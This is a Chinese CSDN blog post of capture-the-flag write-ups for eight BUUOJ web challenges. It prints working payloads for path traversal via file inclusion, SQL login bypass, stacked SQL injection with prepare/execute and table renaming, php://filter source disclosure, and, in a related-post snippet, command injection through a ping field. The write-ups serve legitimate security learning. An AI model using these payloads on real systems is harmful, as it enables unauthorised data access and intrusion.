buuoj部分web题解

最新推荐文章于 2023-05-22 18:02:39 发布
最新推荐文章于 2023-05-22 18:02:39 发布
阅读量1.7k 收藏 4
点赞数
文章标签: sql web安全 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lionel_kai/article/details/119724091
版权

1.[HCTF 2018]WarmUp

 没有什么提示,直接f12查看源码:发现有一个source.php的网站,尝试直接打开

 http://be5d60aa-bc86-4414-8225-92ff9f8e70f8.node4.buuoj.cn:81/source.php

打开发现是一段php代码:

 审计代码发现:

mb_substr(str1,start,[length][,[str2]]):是在str1从start开始length为长度截取字符串,str2是表示字符编码
mb_strpos(str1,str2):查找str2在str1中出现的位置

 代码设置了白名单hint.php和source.php所以首先先去查看一下hint.php文件的内容:

 

 页面回显提示flag不在这里而在另一个文件夹下,所以这里就想先让代码返回true然后执行文件包含,查看flag文件。继续查看代码开始的白名单过滤需要检测有没有hint,source于是初始构造(这里的hint和source选用谁都可以):

?file=hint.php../../../../../ffffllllaaaagggg

 发现显示的是“you can't see it”;那是因为后面检测时会进行一个字符串截取的简单的过滤,需要添加一个?于是构造:

?file=hint.php?../../../../../ffffllllaaaagggg

 这里的../../没有个数要求,但是要适量多一点返回到根目录下去。

 

然后就可以得到flag。

2.[极客大挑战 2019]EasySQL

看到登录框,首先尝试万能密码: 用户名:1' or 1=1 ;#,密码随便写

发现flag直接就出来了:

3.[极客大挑战 2019]Havefun

没什么提示,叫我们lu猫,直接查看源码: 发现存在这样一段注释

 于是构造http://9ddd1b58-1374-4cea-860c-52787879a4b9.node4.buuoj.cn:81/?cat=dog直接出flag:

4.[强网杯 2019]随便注

使用常规注入语句发现:对我们的一些查询语句进行了正则过滤

 发现对我们的select进行了过滤,然后尝试性的绕过以及基本的一些注入,笑死,根本select不到。于是去看wp。。。发现用的时堆叠查询。一次执行多个查询语句。

 

 发现有两张表,于是去查看这两张表的内容:方法一1';desc `1919810931114514`;#

 方法二:1';show columns from `1919810931114514`;#一样可以得到相同的结果

因为select被过滤掉了,所以我们采取预编译的方法(看wp才知道的vegetable dog)

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句
1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare kkk from @sql;EXECUTE kkk;
相当于
1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare kkk from @sql;
EXECUTE kkk;

 然而:又过滤了一下下

 

 但是strstr可以用大小写绕过于是换一下大小写okk

 还有一种题解:更改表名列名,我们将表1919810931114514名字改为words,flag列名字改为id,那么就能得到flag的内容了。

修改表名(将表名user改为users)
alter table user rename to users;

修改列名(将字段名username改为name)
alter table users change uesrname name varchar(30);
1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

拆分开来如下
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#

 然后使用1' or 1=1 #即可查询出flag.

源码很明显的地方,使用multi_query()执行一条或多条sql语句,然后将结果全部输出,因此可以判断是堆叠注入。

5.[ACTF2020 新生赛]Include

仔细观察发现网页文件就是flag.php,猜测flag就在该目录下,于是想到php伪协议进行文件读取。

http://d9953226-2cf0-4a6c-8b63-2a2c07bd7a65.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=./flag.php

拿去进行base64解码:

 得到flag.

6.[SUCTF 2019]EasySQL

BUUCTF [SUCTF 2019] EasySQL_Senimo-CSDN博客

7.[极客大挑战 2019]Secret File

 先去查看源码:发现有一个超链接,点进去

 

  进行了一次页面跳转就结束了,根据提示,可能在跳转的时候secret以及出现了,于是去抓包

 发现多了一个302跳转的action.php于是查看响应

 发现有一个secr3t.php的文件,尝试打开

 发现是一段php代码,只需绕过if打开flag.php即可,直接先构造一个?file=flag.php(虽然我知道不可能这么简单.....)果然....!

 猜测在注释里面,于是利用伪协议打开文件(这里有部分伪协议关键词被过滤了,于是可以用没有被过滤的关键字:?file=php://filter/read=convert.base64-encode/resource=./flag.php

 发现又是一段base64,拿去解码:拿到flag

8.[GYCTF2020]Blacklist

 发现过滤了很多函数,这里采用堆叠注入的方式

show databases;   获取数据库名
show tables;  获取表名
show columns from `table_name`; 获取列名

1';show tables;#

 1';show columns from `FlagHere`;#

 

 因为预编译啥的都被禁用了,这里贴贴大佬payload

1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#

 

 

Lionel_kai
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUOJ-Web-刷题记录
x0r
09-01 340
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
BUU刷题记录(四)
山高路远
04-12 454
以下几题的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的题目,先不按顺序 十七、ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部分,可以修改got表(后面没用到就是了) 进入ida看看反汇编代码 总共有着四个功能,第一个new note: 在第一个功能里面,可以创建一个堆,堆里面第一个存放的是printf函数指针,第二存放了一个free函数指针,第三个存放有区别,当type==1,存放的是一个数据,type ==2,存放的是字符串
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他选项 通过猜测可知filehash的值就是/hint.txt中的算法得到的 从而 我们只要得到cookie_secret的值即可通过脚本的到于/fllllllllllllag对应的filename的值 模板注入拿到cookie_secret get传参 ?filename=/fllllllllllllag&filehash= 回显 发现可疑参数msg
buuoj 基础破解 writeup
m0_73605862的博客
05-22 387
Step3:打开txt文件,发现一串字符串,猜测是base64编码,放到在线网页下解密,得到flag。Step2:根据题目提示密码是四位数字,将加密的文件放到archpr下进行暴力破解,选择暴力破解,数字,最大长度和最小长度都是4位数字。【来源】(buuoj)https://buuoj.cn/challenges#%E5%9F%BA%E7%A1%80%E7%A0%B4%E8%A7%A3。Step1:根据题目提示,加上下载的加密zip。【思路】暴力破解然后base64解码。
buuoj N种方法解决 writeup
m0_73605862的博客
05-22 275
Step2:将文件放到winhex下查看二进制码会不会有线索,发现ASCII码上面写了是jpg的图片,并且用了base64编码,所以猜测后面的字符串经历了base64编码,并且文件尾有==,证实了猜测。【来源】(buuoj)https://buuoj.cn/challenges#N%E7%A7%8D%E6%96%B9%E6%B3%95%E8%A7%A3%E5%86%B3。Step4:扫描二维码得到flag,在线网页为:https://scanqr.org/【题目】N种方法解决。
buuoj刷题笔记
q1415500189的博客
01-22 869
buuoj
西普WEB部分题解
12-09
【标题】"西普WEB部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
ural部分题解
10-25
"ural部分题解"是一个关于编程竞赛平台Ural(也称为URAL Online Judge或University of Maribor Algorithmic contests)的解题集,由大牛出品。这个资源包含Vol1到Vol3的部分题目解答,虽然不完整,但大约涵盖了200道...
西北工业大学 NOJ 部分难题题解
最新发布
01-06
【标题】:“西北工业大学 NOJ 部分难题题解” 【内容详解】 “西北工业大学 NOJ(Northwest Polytechnic University Online Judge)部分难题题解”是一个专门为编程爱好者和学习者提供的资源,旨在帮助他们解决 ...
buuoj 传统知识+古典密码 writeup
m0_73605862的博客
05-14 360
Step4:下一步是将这串字符进行古典密码解码,对于这种数据先猜测为凯撒密码。【来源】(buuoj)https://buuoj.cn/challenges#%E4%BC%A0%E7%BB%9F%E7%9F%A5%E8%AF%86+%E5%8F%A4%E5%85%B8%E5%AF%86%E7%A0%81。Step2:对照天干地支表将数字得出来为28 30 23 8 17 10 16 30,又因为背后写上了加甲子,一甲子是60年,所以最后得出来是88 90 83 68 77 70 76 90。
buuoj [极客大挑战 2019]FinalSQL
pondzhang的专栏
04-02 519
import requests #database length def get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...
buuoj--sqlilabs
weixin_30270815的博客
03-21 594
CTF欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑
BUUWeb刷题记录
dangejinghong的博客
04-23 696
但是,如果要接着直接查这个flag就会出现问题了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUUOJ Web记录
Lnsomniaflight的博客
08-06 842
[HCTF 2018]WarmUp 查看源代码发现注释的<source.php>并访问他 Play road:http://c38c610d-5ea5-47ea-8db1-e516a9d5ee01.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
buuoj刷题记录 - npuctf_2020_easyheap
qq_34010404的博客
03-26 169
题目给了add,show,edit,del函数 问题在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
BUUCTF——Basic题解
Zichel77的博客
08-17 5609
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
2021-04-26 CTF Misc buu oj day3 7道题
LiNa_lInA_741的博客
04-26 975
这里写目录标题乌镇峰会种图类型图片文件解题LSB类型图片文件LSB隐写解题文件中的秘密类型图片文件解题标题 乌镇峰会种图 类型 Misc jpg图片分析 图片文件 b56cde4f-be03-4d07-a0ca-6af22284f0aa.jpg 解题 复习题,同day2里面你竟然赶我走biubiu.jpg,flag:flag{97314e7864a8f62627b26f3f998c37f1} LSB 类型 Misc png图片分析 图片文件 flag11.png LSB隐写 这里是引用 LSB全称Le
Web页面设计面试题解:核心技术与安全传输
在面试过程中,企业不仅关注应聘者对于基础知识的掌握,如FORM表单、CSS样式、DIV布局、JavaScript、Ajax以及jQuery等前端技术的运用,这些内容是网页设计的核心组成部分,它们直接影响到页面的交互性和用户体验。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值